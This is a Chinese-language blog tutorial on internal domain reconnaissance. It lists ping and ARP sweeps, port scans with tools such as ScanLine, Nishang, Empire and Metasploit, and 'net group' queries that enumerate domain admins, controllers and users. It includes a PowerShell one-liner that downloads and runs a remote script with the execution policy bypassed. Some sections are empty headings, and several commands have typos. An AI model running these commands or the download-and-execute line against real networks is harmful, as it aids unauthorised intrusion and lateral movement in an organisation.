内网域之域内信息收集

admin 2024年9月9日22:44:09内网域之域内信息收集已关闭评论20 views字数 2134阅读7分6秒阅读模式

查询当前登录域及登录用户信息

判断主域

①:显示发生系统错误,说明存在域,但当前用户非域用户
②:正确回显DC的时间,说明当前用户为域用户
③:显示找不到域 WORKGROUP 的域控制器,说明当前环境为工作组,不存在域

利用ICMP协议探测内网

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

ARP协议探测内网

1、arp-scan
arp-scan GitHub地址:https://github.com/royhills/arp-scan

arp.exe -t 192.168.0.1/24

Empire arp-scan模块

usemodule situational awareness/network/arpscan

Nishang中的Invoke-ARPScan.ps1脚本

使用Nishang中的Invoke-ARPScan.psl脚本,可以将脚本上传到目标主机中运行,也可以直
接远程加载脚本、自定义掩码和扫描范围,命令如下

powershell.exe -exec bypass -Command "s (Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/20)">>C:\windows\temp\log.txt

ScanLine

ScanLine是一款经典的端口扫描工具,可以在所有版本的Windows操作系统中使用,体积
小,仅使用单个文件,同时支持TCP/UDP端口扫描,命令如下

scan1ine -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,
3306,3389,5432-u 53,161,137,139 -O c:\windows\temp1og.txt -p 192.168.1.1-254 /b

s扫描器

S.exe TCP 192.168.1.1 192.168.1.254 445,3389,1433,7001,1099,8080,80,22,23,21,
25,110,3306,5432,1521,6379,2049,111 256 /Banner /save

MSF端口扫描

auxiliary/scanner/portscan/tcp模块

PowerSploit

powershell.exe -nop -exec bypass -c "IEX (New-object Net.Webclient).Downloadstring ('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA
c:\windows\temp\res.txt"

NiShang

Invoke-PortScan是Nishang的端口扫描模块,用于发现主机、解析主机名、扫描端口,是一
个很实用的模块。输入“Get-Help Invoke-PortScan-full”命令,即可查看帮助信息。
Invoke-.PortScan的参数介绍如下。
·StartAddress:扫描范围的开始地址。
·EndAddress:扫描范围的结束地址。
·ScanPort:进行端口扫描。
·Pot:指定扫描端口。默认扫描的端口有21、22、23、53、69、71、80、98、110、139、
111、389、443、445、1080、1433、2001、2049、3001、3128、5222、6667、6868、7777、
7878、8080、1521、3306、3389、5801、5900、5555、5901。
·TimeOut:设置超时时间
使用以下命令对本地局域网进行扫描,搜索存活主机并解析主机名

Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost

查询域

net view /domain

查询域内所有主机

查询域内所有用户组列表

  • Domain Admins:域管理员。
  • Domain Computers:域内机器。
  • Domain Controllers:域控制器。
  • Domain Guest:域访客,权限较低。
  • Domain Users:域用户。
  • Enterprise Admins:企业系统管理员用户。
    在默认情况下,Domain Admins和Enterprise Admins对域内所有域控制器有完全控制权限。

查询所有域成员计算机列表

net group "domain computers" /domain

获取域密码信息:执行如下命令,获取域密码策略、密码长度、错误锁定等信息

获取域信任信息

查看域控制器的机器名

查看当前时间

查看域控制器组

net group "Domain Controllers" /domain

获取域内用户的详细信息

wmic useraccount get /all

查看存在的用户

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月9日22:44:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网域之域内信息收集https://cn-sec.com/archives/3147251.html